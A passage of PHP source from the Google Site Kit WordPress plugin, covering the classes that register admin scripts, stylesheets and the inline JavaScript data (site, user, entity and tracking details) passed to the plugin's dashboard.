'You now have access to Site Kit', 'google-site-kit' ), '<button type="button" class="googlesitekit-pointer-cta--dismiss dashicons dashicons-no" data-action="dismiss">' . '<span class="screen-reader-text">' . esc_html__( 'Dismiss this notice.', 'google-site-kit' ) . '</span>' . '</button>' ), 'content' => __( 'Check Site Kit’s dashboard to find out how much traffic your site is getting, your most popular pages, top keywords people use to find your site on Search, and more.', 'google-site-kit' ), 'target_id' => 'toplevel_page_googlesitekit-dashboard', 'active_callback' => function ( $hook_suffix ) { if ( 'index.php' !== $hook_suffix || current_user_can( Permissions::AUTHENTICATE ) || ! current_user_can( Permissions::VIEW_SPLASH ) ) { return false; } $dismissed_wp_pointers = get_user_meta( get_current_user_id(), 'dismissed_wp_pointers', true ); if ( ! $dismissed_wp_pointers ) { return true; } $user_id = get_current_user_id(); $dismissed_wp_pointers = get_user_meta( $user_id, 'dismissed_wp_pointers', true ); if ( $dismissed_wp_pointers ) { $dismissed_wp_pointers = explode( ',', $dismissed_wp_pointers ); if ( in_array( self::SLUG, $dismissed_wp_pointers, true ) ) { return false; } } return true; }, 'class' => 'googlesitekit-view-only-pointer', 'buttons' => sprintf( '<a class="googlesitekit-pointer-cta button-primary" href="%s" data-action="dismiss">%s</a>', esc_attr( $this->context->admin_url( 'dashboard' ) ), esc_html__( 'View dashboard', 'google-site-kit' ) ), ), ); } } <?php /** * Class Google\Site_Kit\Core\Dashboard_Sharing\Dashboard_Sharing * * @package Google\Site_Kit\Core\Dashboard_Sharing * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Dashboard_Sharing; use Google\Site_Kit\Context; /** * Class for handling Dashboard Sharing. * * @since 1.82.0 * @access private * @ignore */ class Dashboard_Sharing { /** * View_Only_Pointer instance. * * @since 1.83.0 * @var View_Only_Pointer */ protected $view_only_pointer; /** * Constructor. * * @since 1.82.0 * @since 1.158.0 Remove $user_options and $context params. * @since 1.166.0 Restore $context param. * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->view_only_pointer = new View_Only_Pointer( $context ); } /** * Registers functionality. * * @since 1.82.0 */ public function register() { $this->view_only_pointer->register(); } } <?php /** * Class Google\Site_Kit\Core\Assets\Asset * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Assets; use Google\Site_Kit\Context; /** * Class representing a single asset. * * @since 1.0.0 * @access private * @ignore */ abstract class Asset { // Various page contexts for Site Kit in the WordPress Admin. const CONTEXT_ADMIN_GLOBAL = 'admin-global'; const CONTEXT_ADMIN_POST_EDITOR = 'admin-post-editor'; const CONTEXT_ADMIN_BLOCK_EDITOR = 'admin-block-editor'; const CONTEXT_ADMIN_POSTS = 'admin-posts'; const CONTEXT_ADMIN_SITEKIT = 'admin-sitekit'; /** * Unique asset handle. * * @since 1.0.0 * @var string */ protected $handle; /** * Asset arguments. * * @since 1.0.0 * @var array */ protected $args = array(); /** * Constructor. * * @since 1.0.0 * @since 1.37.0 Add the 'load_contexts' argument. * * @param string $handle Unique asset handle. * @param array $args { * Associative array of asset arguments. * * @type string $src Required asset source URL. * @type array $dependencies List of asset dependencies. Default empty array. * @type string $version Asset version. Default is the version of Site Kit. * @type bool $fallback Whether to only register as a fallback. Default false. * @type callable $before_print Optional callback to execute before printing. Default none. * @type string[] $load_contexts Optional array of page context values to determine on which page types to load this asset (see the `CONTEXT_` variables above). * } */ public function __construct( $handle, array $args ) { $this->handle = $handle; $this->args = wp_parse_args( $args, array( 'src' => '', 'dependencies' => array(), 'version' => GOOGLESITEKIT_VERSION, 'fallback' => false, 'before_print' => null, 'load_contexts' => array( self::CONTEXT_ADMIN_SITEKIT ), ) ); } /** * Gets the notice handle. * * @since 1.0.0 * * @return string Unique notice handle. */ public function get_handle() { return $this->handle; } /** * Checks to see if the specified context exists for the current request. * * @since 1.37.0 * * @param string $context Context value (see the `CONTEXT_` variables above). * @return bool TRUE if context exists; FALSE otherwise. */ public function has_context( $context ) { return in_array( $context, $this->args['load_contexts'], true ); } /** * Registers the asset. * * @since 1.0.0 * @since 1.15.0 Adds $context parameter. * * @param Context $context Plugin context. */ abstract public function register( Context $context ); /** * Enqueues the asset. * * @since 1.0.0 */ abstract public function enqueue(); /** * Executes the extra callback if defined before printing the asset. * * @since 1.2.0 */ final public function before_print() { if ( ! is_callable( $this->args['before_print'] ) ) { return; } call_user_func( $this->args['before_print'], $this->handle ); } } <?php /** * Class Google\Site_Kit\Core\Assets\Manifest * * @package GoogleSite_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Assets; use Google\Site_Kit\Plugin; /** * Assets manifest. * * @since 1.15.0 * @access private * @ignore */ class Manifest { /** * Entries as $handle => [ $filename, $hash ] map. * * @since 1.48.0 * @var array */ private static $data; /** * Gets the manifest entry for the given handle. * * @since 1.48.0 * * @param string $handle Asset handle to get manifest data for. * @return array List of $filename and $hash, or `null` for both if not found. */ public static function get( $handle ) { if ( null === self::$data ) { self::load(); } if ( isset( self::$data[ $handle ] ) ) { return self::$data[ $handle ]; } return array( null, null ); } /** * Loads the generated manifest file. * * @since 1.48.0 */ private static function load() { $path = Plugin::instance()->context()->path( 'dist/manifest.php' ); if ( file_exists( $path ) ) { // If the include fails, $data will be `false` // so this should only be attempted once. self::$data = include $path; } } } <?php /** * Class Google\Site_Kit\Core\Assets\Script * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Assets; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Util\BC_Functions; /** * Class representing a single script. * * @since 1.0.0 * @access private * @ignore */ class Script extends Asset { /** * Constructor. * * @since 1.0.0 * * @param string $handle Unique script handle. * @param array $args { * Associative array of script arguments. * * @type string $src Required script source URL. * @type array $dependencies List of script dependencies. Default empty array. * @type string $version Script version. Default is the version of Site Kit. * @type bool $fallback Whether to only register as a fallback. Default false. * @type callable $before_print Optional callback to execute before printing. Default none. * @type bool $in_footer Whether to load script in footer. Default true. * @type string $execution How to handle script execution, e.g. 'defer'. Default empty string. * } */ public function __construct( $handle, array $args ) { parent::__construct( $handle, $args ); $this->args = wp_parse_args( $this->args, array( 'in_footer' => true, 'execution' => '', ) ); } /** * Registers the script. * * @since 1.0.0 * @since 1.15.0 Adds $context parameter. * * @param Context $context Plugin context. */ public function register( Context $context ) { if ( $this->args['fallback'] && wp_script_is( $this->handle, 'registered' ) ) { return; } $src = $this->args['src']; $version = $this->args['version']; if ( $src ) { $entry = Manifest::get( $this->handle ); if ( is_array( $entry[0] ) ) { // If the first entry item is an array, we can assume `$entry` is an array of entries in the format filename => hash. // In this scenario we want to match the nested entry against the filename provided in `$src`. $src_filename = basename( $src ); foreach ( $entry as $entry_pair ) { if ( $this->is_matching_manifest_entry( $entry_pair, $src_filename ) ) { list( $filename, $hash ) = $entry_pair; break; } } } else { // Otherwise, `$entry` will be a single entry in the format filename => hash. list( $filename, $hash ) = $entry; } if ( $filename ) { $src = $context->url( 'dist/assets/js/' . $filename ); $version = $hash; } } wp_register_script( $this->handle, $src, (array) $this->args['dependencies'], $version, $this->args['in_footer'] ); if ( ! empty( $this->args['execution'] ) ) { wp_script_add_data( $this->handle, 'script_execution', $this->args['execution'] ); } if ( ! empty( $src ) ) { $this->set_locale_data(); } } /** * Enqueues the script. * * @since 1.0.0 */ public function enqueue() { wp_enqueue_script( $this->handle ); } /** * Checks if the provided manifest entry matches the given filename. * * @since 1.89.0 * * @param array $entry Array of filename, hash. * @param string $src_filename Filename to check. * @return bool */ private function is_matching_manifest_entry( array $entry, $src_filename ) { list ( $filename, $hash ) = $entry; if ( ! isset( $hash ) ) { // If the hash is not set, it means the hash is embedded in the entry filename. // Remove the hash then compare to the src filename. $entry_filename_without_hash = preg_replace( '/-[a-f0-9]+\.js$/', '.js', $filename ); if ( $src_filename === $entry_filename_without_hash ) { return true; } } if ( $filename === $src_filename ) { return true; } return false; } /** * Sets locale data for the script, if it has translations. * * @since 1.21.0 */ private function set_locale_data() { $json_translations = load_script_textdomain( $this->handle, 'google-site-kit' ); if ( ! $json_translations ) { return; } $output = <<<JS ( function( domain, translations ) { try { var localeData = translations.locale_data[ domain ] || translations.locale_data.messages; localeData[""].domain = domain; googlesitekit.i18n.setLocaleData( localeData, domain ); } catch { } } )( "google-site-kit", {$json_translations} ); JS; wp_add_inline_script( $this->handle, $output, 'before' ); } } <?php /** * Class Google\Site_Kit\Core\Assets\Script_Data * * @package Google\Site_Kit\Core\Assets * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Assets; /** * Class for virtual "data-only" scripts. * * @since 1.5.0 * @access private * @ignore */ class Script_Data extends Script { /** * Constructor. * * @since 1.5.0 * * @param string $handle Unique script handle. * @param array $args { * Associative array of script arguments. * * @type callable $data_callback Required. Function to return JSON-encodable data. * @type string $global Required. Name of global variable to assign data to in Javascript. * @type array $dependencies Optional. List of script dependencies. Default empty array. * } */ public function __construct( $handle, array $args ) { // Ensure required keys are always set. $args = $args + array( 'data_callback' => null, 'global' => '', ); // SRC will always be false. $args['src'] = false; parent::__construct( $handle, $args ); // Lazy-load script data before handle is to be printed. $this->args['before_print'] = function ( $handle ) { if ( empty( $this->args['global'] ) || ! is_callable( $this->args['data_callback'] ) ) { return; } $data = call_user_func( $this->args['data_callback'], $handle ); $this->add_script_data( $data ); }; } /** * Adds the given data to the script handle's 'data' key. * * 'data' is the key used by `wp_localize_script`, which is output * in older versions of WP even if the handle has no src (such as an alias). * This is done manually instead of using `wp_localize_script` to avoid casting * top-level keys to strings as this function is primarily intended for * providing an array of translations to Javascript rather than arbitrary data. * * @see \WP_Scripts::localize * * @since 1.5.0 * * @param mixed $data Data to be assigned to the defined global. */ private function add_script_data( $data ) { $script_data = wp_scripts()->get_data( $this->handle, 'data' ) ?: ''; $js = sprintf( 'var %s = %s;', preg_replace( '[^\w\d_-]', '', $this->args['global'] ), // Ensure only a-zA-Z0-9_- are allowed. wp_json_encode( $data ) ); wp_scripts()->add_data( $this->handle, 'data', trim( "$script_data\n$js" ) ); } } <?php /** * Class Google\Site_Kit\Core\Assets\Assets * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Assets; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Modules\Module_Sharing_Settings; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Util\Feature_Flags; use WP_Dependencies; use WP_Post_Type; /** * Class managing assets. * * @since 1.0.0 * @access private * @ignore */ final class Assets { /** * Plugin context. * * @since 1.0.0 * @var Context */ private $context; /** * Lazy-loaded assets as $handle => $instance pairs. * * @since 1.0.0 * @var array */ private $assets = array(); /** * Internal flag for whether assets have been registered yet. * * @since 1.2.0 * @var bool */ private $assets_registered = false; /** * Internal list of print callbacks already done. * * @since 1.2.0 * @var array */ private $print_callbacks_done = array(); /** * Constructor. * * @since 1.0.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Registers functionality through WordPress hooks. * * @since 1.0.0 * @since 1.37.0 Enqueues Block Editor assets. */ public function register() { $register_callback = function () { if ( ! is_admin() ) { return; } if ( $this->assets_registered ) { return; } $this->assets_registered = true; $this->register_assets(); }; add_action( 'admin_enqueue_scripts', $register_callback ); add_action( 'wp_enqueue_scripts', $register_callback ); add_filter( 'script_loader_tag', function ( $tag, $handle ) { return $this->add_async_defer_attribute( $tag, $handle ); }, 10, 2 ); // All other asset-related general logic should only be active when the // current user can actually use Site Kit. if ( false === ( current_user_can( Permissions::VIEW_SPLASH ) || current_user_can( Permissions::VIEW_DASHBOARD ) ) ) { return; } $this->add_amp_dev_mode_attributes( $this->get_assets() ); add_action( 'admin_print_scripts-edit.php', function () { global $post_type; if ( 'post' !== $post_type ) { // For CONTEXT_ADMIN_POSTS we only load scripts for the 'post' post type. return; } $assets = $this->get_assets(); array_walk( $assets, function ( Asset $asset ) { if ( $asset->has_context( Asset::CONTEXT_ADMIN_POSTS ) ) { $this->enqueue_asset( $asset->get_handle() ); } } ); } ); if ( is_admin() ) { add_action( 'enqueue_block_assets', function () { $assets = $this->get_assets(); array_walk( $assets, function ( $asset ) { if ( $asset->has_context( Asset::CONTEXT_ADMIN_BLOCK_EDITOR ) ) { $this->enqueue_asset( $asset->get_handle() ); } } ); } ); } add_action( 'enqueue_block_editor_assets', function () { $assets = $this->get_assets(); array_walk( $assets, function ( $asset ) { if ( $asset->has_context( Asset::CONTEXT_ADMIN_POST_EDITOR ) ) { $this->enqueue_asset( $asset->get_handle() ); } } ); } ); $scripts_print_callback = function () { $scripts = wp_scripts(); $this->run_before_print_callbacks( $scripts, $scripts->queue ); }; add_action( 'wp_print_scripts', $scripts_print_callback ); add_action( 'admin_print_scripts', $scripts_print_callback ); $styles_print_callback = function () { $styles = wp_styles(); $this->run_before_print_callbacks( $styles, $styles->queue ); }; add_action( 'wp_print_styles', $styles_print_callback ); add_action( 'admin_print_styles', $styles_print_callback ); } /** * Enqueues the given plugin asset (script or stylesheet). * * The asset must already be registered in order to be enqueued. * * @since 1.0.0 * * @param string $handle Asset handle. */ public function enqueue_asset( $handle ) { // Register assets on-the-fly if necessary (currently the case for admin bar in frontend). if ( ! $this->assets_registered ) { $this->assets_registered = true; $this->register_assets(); } $assets = $this->get_assets(); if ( empty( $assets[ $handle ] ) ) { return; } $assets[ $handle ]->enqueue(); } /** * Enqueues Google fonts. * * @since 1.0.0 * @deprecated 1.41.0 This method is no longer used as fonts are loaded as a normal style dependency now. */ public function enqueue_fonts() { _deprecated_function( __METHOD__, '1.41.0' ); $assets = $this->get_assets(); if ( ! empty( $assets['googlesitekit-fonts'] ) && $assets['googlesitekit-fonts'] instanceof Asset ) { $assets['googlesitekit-fonts']->enqueue(); } } /** * Get Google fonts src for CSS. * * @since 1.41.0 * * @return string String URL src. */ protected function get_fonts_src() { $font_families = array( 'Google+Sans+Text:400,500', 'Google+Sans+Display:400,500,700', ); $filtered_font_families = apply_filters( 'googlesitekit_font_families', $font_families ); if ( empty( $filtered_font_families ) ) { return ''; } return add_query_arg( array( 'family' => implode( '|', $filtered_font_families ), 'subset' => 'latin-ext', 'display' => 'fallback', ), 'https://fonts.googleapis.com/css' ); } /** * Registers all plugin assets. * * @since 1.0.0 */ private function register_assets() { $assets = $this->get_assets(); foreach ( $assets as $asset ) { $asset->register( $this->context ); } } /** * Add data-ampdevmode attributes to assets. * * @todo What about dependencies? * * @param Asset[] $assets Assets. */ private function add_amp_dev_mode_attributes( $assets ) { add_filter( 'script_loader_tag', function ( $tag, $handle ) use ( $assets ) { // TODO: 'hoverintent-js' can be removed from here at some point, see https://github.com/ampproject/amp-wp/pull/3928. if ( $this->context->is_amp() && ( isset( $assets[ $handle ] ) && ( $assets[ $handle ] instanceof Script || 'hoverintent-js' === $handle ) ) ) { $tag = preg_replace( '/(?<=<script)(?=\s|>)/i', ' data-ampdevmode', $tag ); } return $tag; }, 10, 2 ); add_filter( 'style_loader_tag', function ( $tag, $handle ) use ( $assets ) { if ( $this->context->is_amp() && isset( $assets[ $handle ] ) && $assets[ $handle ] instanceof Stylesheet ) { $tag = preg_replace( '/(?<=<link)(?=\s|>)/i', ' data-ampdevmode', $tag ); } return $tag; }, 10, 2 ); } /** * Forms an array of dependencies based on the necessary context. * * @since 1.87.0 * * @param string $context The context for which dependencies should be formed. * @return array The array of dependencies. */ private function get_asset_dependencies( $context = '' ) { $dependencies = array( 'googlesitekit-tracking-data', 'googlesitekit-runtime', 'googlesitekit-i18n', 'googlesitekit-vendor', 'googlesitekit-commons', 'googlesitekit-data', 'googlesitekit-datastore-forms', 'googlesitekit-datastore-location', 'googlesitekit-datastore-site', 'googlesitekit-datastore-user', 'googlesitekit-datastore-ui', 'googlesitekit-widgets', 'googlesitekit-notifications', ); if ( 'dashboard' === $context || 'dashboard-sharing' === $context ) { array_push( $dependencies, 'googlesitekit-components' ); } if ( 'dashboard-sharing' === $context ) { array_push( $dependencies, 'googlesitekit-dashboard-sharing-data' ); } return $dependencies; } /** * Gets all plugin assets. * * The method will lazy-load assets in an internal property so that the processing only happens once. * * @since 1.0.0 * * @return Asset[] Associative array of asset $handle => $instance pairs. */ private function get_assets() { if ( $this->assets ) { return $this->assets; } $base_url = $this->context->url( 'dist/assets/' ); $dependencies = $this->get_asset_dependencies(); // Register plugin scripts. $assets = array( new Script_Data( 'googlesitekit-commons', array( 'global' => '_googlesitekitLegacyData', 'data_callback' => function () { return $this->get_inline_data(); }, ) ), new Script_Data( 'googlesitekit-base-data', array( 'global' => '_googlesitekitBaseData', 'data_callback' => function () { return $this->get_inline_base_data(); }, ) ), new Script_Data( 'googlesitekit-entity-data', array( 'global' => '_googlesitekitEntityData', 'data_callback' => function () { return $this->get_inline_entity_data(); }, ) ), new Script_Data( 'googlesitekit-user-data', array( 'global' => '_googlesitekitUserData', 'data_callback' => function () { return $this->get_inline_user_data(); }, ) ), new Script_Data( 'googlesitekit-apifetch-data', array( 'global' => '_googlesitekitAPIFetchData', 'data_callback' => function () { /** * Preload common data by specifying an array of REST API paths that will be preloaded. * * Filters the array of paths that will be preloaded. * * @since 1.7.0 * * @param array $preload_paths Array of paths to preload. */ $preload_paths = apply_filters( 'googlesitekit_apifetch_preload_paths', array() ); $preloaded = array_reduce( array_unique( $preload_paths ), 'rest_preload_api_request', array() ); return array( 'nonce' => ( wp_installing() && ! is_multisite() ) ? '' : wp_create_nonce( 'wp_rest' ), 'nonceEndpoint' => admin_url( 'admin-ajax.php?action=rest-nonce' ), 'preloadedData' => $preloaded, 'rootURL' => esc_url_raw( get_rest_url() ), ); }, ) ), new Script_Data( 'googlesitekit-dashboard-sharing-data', array( 'global' => '_googlesitekitDashboardSharingData', 'data_callback' => function () { return $this->get_inline_dashboard_sharing_data(); }, ) ), new Script_Data( 'googlesitekit-tracking-data', array( 'global' => '_googlesitekitTrackingData', 'data_callback' => function () { return $this->get_inline_tracking_data(); }, ) ), new Script_Data( 'googlesitekit-modules-data', array( 'global' => '_googlesitekitModulesData', 'data_callback' => function () { return $this->get_inline_modules_data(); }, ) ), new Script( 'googlesitekit-runtime', array( 'src' => $base_url . 'js/runtime.js', ) ), new Script( 'googlesitekit-polyfills', array( 'src' => $base_url . 'js/googlesitekit-polyfills.js', 'dependencies' => array( 'googlesitekit-base-data', ), ) ), new Script( 'googlesitekit-i18n', array( 'src' => $base_url . 'js/googlesitekit-i18n.js', ) ), new Script( 'googlesitekit-vendor', array( 'src' => $base_url . 'js/googlesitekit-vendor.js', 'dependencies' => array( 'googlesitekit-i18n', 'googlesitekit-runtime', 'googlesitekit-polyfills', ), ) ), // Admin assets. new Script( 'googlesitekit-components', array( 'src' => $base_url . 'js/googlesitekit-components.js', ) ), new Script( 'googlesitekit-activation', array( 'src' => $base_url . 'js/googlesitekit-activation.js', 'dependencies' => $this->get_asset_dependencies( 'dashboard' ), ) ), // Begin JSR Assets. new Script( 'googlesitekit-api', array( 'src' => $base_url . 'js/googlesitekit-api.js', 'dependencies' => array( 'googlesitekit-vendor', 'googlesitekit-apifetch-data', ), ) ), new Script( 'googlesitekit-data', array( 'src' => $base_url . 'js/googlesitekit-data.js', 'dependencies' => array( 'googlesitekit-vendor', 'googlesitekit-api', ), ) ), new Script( 'googlesitekit-datastore-user', array( 'src' => $base_url . 'js/googlesitekit-datastore-user.js', 'dependencies' => array( 'googlesitekit-data', 'googlesitekit-api', 'googlesitekit-user-data', 'googlesitekit-datastore-site', ), ) ), new Script( 'googlesitekit-datastore-location', array( 'src' => $base_url . 'js/googlesitekit-datastore-location.js', 'dependencies' => array( 'googlesitekit-vendor', 'googlesitekit-data', ), ) ), new Script( 'googlesitekit-datastore-site', array( 'src' => $base_url . 'js/googlesitekit-datastore-site.js', 'dependencies' => array( 'googlesitekit-vendor', 'googlesitekit-api', 'googlesitekit-data', 'googlesitekit-base-data', 'googlesitekit-entity-data', ), ) ), new Script( 'googlesitekit-datastore-forms', array( 'src' => $base_url . 'js/googlesitekit-datastore-forms.js', 'dependencies' => array( 'googlesitekit-data', ), ) ), new Script( 'googlesitekit-datastore-ui', array( 'src' => $base_url . 'js/googlesitekit-datastore-ui.js', 'dependencies' => array( 'googlesitekit-data', ), ) ), new Script( 'googlesitekit-modules', array( 'src' => $base_url . 'js/googlesitekit-modules.js', 'dependencies' => array( 'googlesitekit-vendor', 'googlesitekit-api', 'googlesitekit-data', 'googlesitekit-datastore-site', 'googlesitekit-datastore-user', ), ) ), new Script( 'googlesitekit-widgets', array( 'src' => $base_url . 'js/googlesitekit-widgets.js', 'dependencies' => array( 'googlesitekit-data', 'googlesitekit-i18n', 'googlesitekit-components', ), ) ), new Script( 'googlesitekit-notifications', array( 'src' => $base_url . 'js/googlesitekit-notifications.js', 'dependencies' => array( 'googlesitekit-data', 'googlesitekit-i18n', 'googlesitekit-components', ), ) ), new Script( 'googlesitekit-user-input', array( 'src' => $base_url . 'js/googlesitekit-user-input.js', 'dependencies' => $this->get_asset_dependencies( 'dashboard' ), ) ), new Script( 'googlesitekit-key-metrics-setup', array( 'src' => $base_url . 'js/googlesitekit-key-metrics-setup.js', 'dependencies' => $this->get_asset_dependencies( 'dashboard' ), ) ), // End JSR Assets. new Script( 'googlesitekit-splash', array( 'src' => $base_url . 'js/googlesitekit-splash.js', 'dependencies' => $this->get_asset_dependencies( 'dashboard' ), ) ), new Script( 'googlesitekit-entity-dashboard', array( 'src' => $base_url . 'js/googlesitekit-entity-dashboard.js', 'dependencies' => $this->get_asset_dependencies( 'dashboard-sharing' ), ) ), new Script( 'googlesitekit-main-dashboard', array( 'src' => $base_url . 'js/googlesitekit-main-dashboard.js', 'dependencies' => $this->get_asset_dependencies( 'dashboard-sharing' ), ) ), new Script( 'googlesitekit-settings', array( 'src' => $base_url . 'js/googlesitekit-settings.js', 'dependencies' => $this->get_asset_dependencies( 'dashboard-sharing' ), ) ), new Script( 'googlesitekit-ad-blocking-recovery', array( 'src' => $base_url . 'js/googlesitekit-ad-blocking-recovery.js', 'dependencies' => $this->get_asset_dependencies( 'dashboard' ), ) ), new Script( 'googlesitekit-block-tracking', array( 'src' => $base_url . 'js/googlesitekit-block-tracking.js', 'dependencies' => array( 'googlesitekit-tracking-data', 'googlesitekit-data', ), 'load_contexts' => array( Asset::CONTEXT_ADMIN_POST_EDITOR ), ) ), new Stylesheet( 'googlesitekit-admin-css', array( 'src' => $base_url . 'css/googlesitekit-admin-css.css', 'dependencies' => array( 'googlesitekit-fonts', ), ) ), // WP Dashboard assets. new Script( 'googlesitekit-wp-dashboard', array( 'src' => $base_url . 'js/googlesitekit-wp-dashboard.js', 'dependencies' => $dependencies, 'execution' => 'defer', ) ), new Stylesheet( 'googlesitekit-wp-dashboard-css', array( 'src' => $base_url . 'css/googlesitekit-wp-dashboard-css.css', 'dependencies' => array( 'googlesitekit-fonts', ), ) ), new Stylesheet( 'googlesitekit-authorize-application-css', array( 'src' => $base_url . 'css/googlesitekit-authorize-application-css.css', 'dependencies' => array( 'googlesitekit-fonts', ), ) ), // Admin bar assets. new Script( 'googlesitekit-adminbar', array( 'src' => $base_url . 'js/googlesitekit-adminbar.js', 'dependencies' => $dependencies, 'execution' => 'defer', ) ), new Script( 'googlesitekit-metric-selection', array( 'src' => $base_url . 'js/googlesitekit-metric-selection.js', 'dependencies' => $this->get_asset_dependencies( 'dashboard' ), ) ), new Stylesheet( 'googlesitekit-adminbar-css', array( 'src' => $base_url . 'css/googlesitekit-adminbar-css.css', 'dependencies' => array( 'googlesitekit-fonts', ), ) ), new Stylesheet( 'googlesitekit-fonts', array( 'src' => $this->get_fonts_src(), 'version' => null, ) ), ); /** * Filters the list of assets that Site Kit should register. * * This filter covers both scripts and stylesheets. * * @since 1.7.0 * * @param Asset[] $assets List of Asset objects. */ $assets = apply_filters( 'googlesitekit_assets', $assets ); $this->assets = array(); foreach ( $assets as $asset ) { $this->assets[ $asset->get_handle() ] = $asset; } return $this->assets; } /** * Gets the most basic inline data needed for JS files. * * This should not include anything remotely expensive to compute. * * @since 1.2.0 * * @return array The base inline data to be output. */ private function get_inline_base_data() { global $wpdb; $site_url = $this->context->get_reference_site_url(); $inline_data = array( 'homeURL' => trailingslashit( $this->context->get_canonical_home_url() ), 'referenceSiteURL' => esc_url_raw( trailingslashit( $site_url ) ), 'adminURL' => esc_url_raw( trailingslashit( admin_url() ) ), 'assetsURL' => esc_url_raw( $this->context->url( 'dist/assets/' ) ), 'widgetsAdminURL' => esc_url_raw( $this->get_widgets_admin_url() ), 'blogPrefix' => $wpdb->get_blog_prefix(), 'ampMode' => $this->context->get_amp_mode(), 'isNetworkMode' => $this->context->is_network_mode(), 'timezone' => get_option( 'timezone_string' ), 'startOfWeek' => (int) get_option( 'start_of_week' ), 'siteName' => wp_specialchars_decode( get_bloginfo( 'name' ), ENT_QUOTES ), 'siteLocale' => $this->context->get_locale(), 'enabledFeatures' => Feature_Flags::get_enabled_features(), 'webStoriesActive' => defined( 'WEBSTORIES_VERSION' ), 'postTypes' => $this->get_post_types(), 'storagePrefix' => $this->get_storage_prefix(), 'referenceDate' => apply_filters( 'googlesitekit_reference_date', null ), 'productPostType' => $this->get_product_post_type(), 'anyoneCanRegister' => (bool) get_option( 'users_can_register' ), 'isMultisite' => is_multisite(), ); /** * Filters the most basic inline data to pass to JS. * * This should not include anything remotely expensive to compute. * * @since 1.2.0 * * @param array $data Base data. */ return apply_filters( 'googlesitekit_inline_base_data', $inline_data ); } /** * Gets the available public post type slugs and their labels. * * @since 1.81.0 * * @return array Available post types array with their respective slugs and labels. */ private function get_post_types() { $post_types = array(); $all_post_types = get_post_types( array( 'public' => true ), 'objects' ); foreach ( $all_post_types as $post_type_slug => $post_type_obj ) { $post_types[] = array( 'slug' => $post_type_slug, 'label' => $post_type_obj->label, ); } return $post_types; } /** * Gets the widgets admin edit page or block editor URL depending * on the current theme. * * Themes which have FSE support do not have the old widgets admin screen. Such * themes only have the option to edit widgets directly in the block editor. * * @since 1.81.0 * * @return string The admin widgets page or block editor URL. */ private function get_widgets_admin_url() { $current_theme = wp_get_theme(); if ( method_exists( $current_theme, 'is_block_theme' ) && $current_theme->is_block_theme() ) { return admin_url( 'site-editor.php' ); } if ( count( $GLOBALS['wp_registered_sidebars'] ) > 0 ) { return admin_url( 'widgets.php' ); } return ''; } /** * Gets the inline data specific to the current entity. * * @since 1.7.0 * * @return array The site inline data to be output. */ private function get_inline_entity_data() { $current_entity = $this->context->get_reference_entity(); return array( 'currentEntityURL' => $current_entity ? $current_entity->get_url() : null, 'currentEntityType' => $current_entity ? $current_entity->get_type() : null, 'currentEntityTitle' => $current_entity ? $current_entity->get_title() : null, 'currentEntityID' => $current_entity ? $current_entity->get_id() : null, ); } /** * Gets the inline data specific to the current user * * @since 1.9.0 * * @return array The user inline data to be output. */ private function get_inline_user_data() { $current_user = wp_get_current_user(); $inline_data = array( 'user' => array( 'id' => $current_user->ID, 'email' => $current_user->user_email, 'wpEmail' => $current_user->user_email, // Preserved for features that need the original WP email (email gets overridden during proxy auth). 'name' => $current_user->display_name, 'picture' => get_avatar_url( $current_user->user_email ), ), ); /** * Filters the user inline data to pass to JS. * * This should not include anything remotely expensive to compute. * * @since 1.9.0 * * @param array $data User data. */ return apply_filters( 'googlesitekit_user_data', $inline_data ); } /** * Gets the inline dashboard sharing data * * @since 1.49.0 * * @return array The dashboard sharing inline data to be output. */ private function get_inline_dashboard_sharing_data() { $all_roles = wp_roles()->roles; $inline_data = array( 'roles' => array() ); foreach ( $all_roles as $role_slug => $role_details ) { $role = get_role( $role_slug ); // Filter the role that has `edit_posts` capability. if ( $role->has_cap( 'edit_posts' ) ) { $inline_data['roles'][] = array( 'id' => $role_slug, 'displayName' => translate_user_role( $role_details['name'] ), ); } } $settings = new Module_Sharing_Settings( new Options( $this->context ) ); $inline_data['settings'] = $settings->get(); /** * Filters the dashboard sharing inline data to pass to JS. * * @since 1.49.0 * * @param array $data dashboard sharing data. */ return apply_filters( 'googlesitekit_dashboard_sharing_data', $inline_data ); } /** * Gets data relevant for `trackEvent` calls. * * @since 1.78.0 * * @return array The tracking inline data to be output. */ private function get_inline_tracking_data() { $site_url = $this->context->get_reference_site_url(); $current_user = wp_get_current_user(); $inline_data = array( 'referenceSiteURL' => esc_url_raw( trailingslashit( $site_url ) ), 'userIDHash' => md5( $site_url . $current_user->ID ), ); /** * Filters the data relevant to trackEvent calls to pass to JS. * * @since 1.78.0 * * @param array $inline_data Tracking data. */ return apply_filters( 'googlesitekit_inline_tracking_data', $inline_data ); } /** * Gets the inline data needed for core plugin scripts. * * @since 1.0.0 * * @return array The inline data to be output. */ private function get_inline_data() { $site_url = $this->context->get_reference_site_url(); $input = $this->context->input(); $admin_data = array( 'siteURL' => esc_url_raw( $site_url ), 'resetSession' => $input->filter( INPUT_GET, 'googlesitekit_reset_session', FILTER_VALIDATE_BOOLEAN ), ); return array( /** * Filters the admin data to pass to JS. * * @since 1.0.0 * * @param array $data Admin data. */ 'admin' => apply_filters( 'googlesitekit_admin_data', $admin_data ), 'locale' => $this->context->get_locale( 'user' ), /** * Filters the setup data to pass to JS, needed during the dashboard page load. * * 